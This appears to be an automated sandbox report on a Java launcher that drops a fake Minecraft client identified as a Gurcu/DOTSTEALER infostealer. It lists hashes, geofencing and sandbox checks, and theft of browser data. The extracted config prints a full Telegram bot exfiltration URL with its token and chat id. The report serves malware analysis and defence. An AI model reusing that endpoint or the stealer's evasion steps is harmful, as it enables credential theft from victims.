Analysis
-
max time kernel
121s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-12-2024 18:34
Static task
static1
Behavioral task
behavioral1
Sample
Apollo_Launcher/Apollo.jar
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Apollo_Launcher/Apollo.jar
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Apollo_Launcher/start.bat
Resource
win7-20240708-en
General
-
Target
Apollo_Launcher/Apollo.jar
-
Size
2.0MB
-
MD5
15eb6fe01e6f4de3898fb3faae895d99
-
SHA1
938d9712ba8b467f152b8ccbeb6c8808b923fc46
-
SHA256
8bc91eaf5b775214114e924cae0ab9d121407f9e2f596dbe23392f50e1cdd504
-
SHA512
7a0adf4c59ec37249ae6890abc15c7191a6acec5271321c65ab2eb3d1b98508a744e7e5efd041bbaafee76bc06f55e9398a3c9f87d5c3c0d1d06e6d98ebe2092
-
SSDEEP
49152:clTene/sJMqUf0YS4N8+7euBwlLy6t2TSliSjek/:cline/pq1YF6d+ZTnSB/
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4549607810&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Signatures
-
Gurcu family
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation Minecraft_Client_1.21.1.exe -
Executes dropped EXE 1 IoCs
pid Process 2556 Minecraft_Client_1.21.1.exe -
Loads dropped DLL 1 IoCs
pid Process 2556 Minecraft_Client_1.21.1.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 15 pastebin.com 18 raw.githubusercontent.com 19 raw.githubusercontent.com 21 raw.githubusercontent.com 14 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Minecraft_Client_1.21.1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Minecraft_Client_1.21.1.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings OpenWith.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 848 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe 2556 Minecraft_Client_1.21.1.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1700 OpenWith.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2556 Minecraft_Client_1.21.1.exe -
Suspicious use of SetWindowsHookEx 33 IoCs
pid Process 1628 java.exe 1628 java.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe 1700 OpenWith.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1628 wrote to memory of 2556 1628 java.exe 86 PID 1628 wrote to memory of 2556 1628 java.exe 86 PID 2556 wrote to memory of 3852 2556 Minecraft_Client_1.21.1.exe 96 PID 2556 wrote to memory of 3852 2556 Minecraft_Client_1.21.1.exe 96 PID 1700 wrote to memory of 848 1700 OpenWith.exe 116 PID 1700 wrote to memory of 848 1700 OpenWith.exe 116
Processes
-
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\Apollo_Launcher\Apollo.jar1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1\Minecraft_Client_1.21.1.exeC:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1\Minecraft_Client_1.21.1.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp92DA.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp92DA.tmp.bat3⤵PID:3852
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3300
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\3975551761\payload.dat2⤵
- Opens file in notepad (likely ransom note)
PID:848
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
5.6MB
MD531946abddd530c1e86f36c191046336b
SHA1b480a8833f684cba353f628c087bf7297a4d4df8
SHA256272a3703b7c4e353638c410008c95503abb90d47b81c5b253773cb0d546e5a0d
SHA51293aeacbb4227b9ae1f731135dc42697fbdadff9c3259ccde9d7b7b4eecfef89c71e3d773df4281cae3d84f81246d6a95da9eaaea85efb949ca33a42f97ead8cb
-
Filesize
215B
MD5edecc78b2f241e1272f6197fe89b7e9c
SHA1f454966e03384768f142ff452dbf351dc25bdfdf
SHA25603f91fda3049aa1a33f7b680ba0fd7a2df926e878275ef0433be1838f3e884da
SHA512e60e40c598001e122f8988bba13022db987c16a5515280c79e4b2ffcc5b507ff0a399a5273db533ba5ba37d63207af9b027eb7e768745d48499cc9a6fb86a04f
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84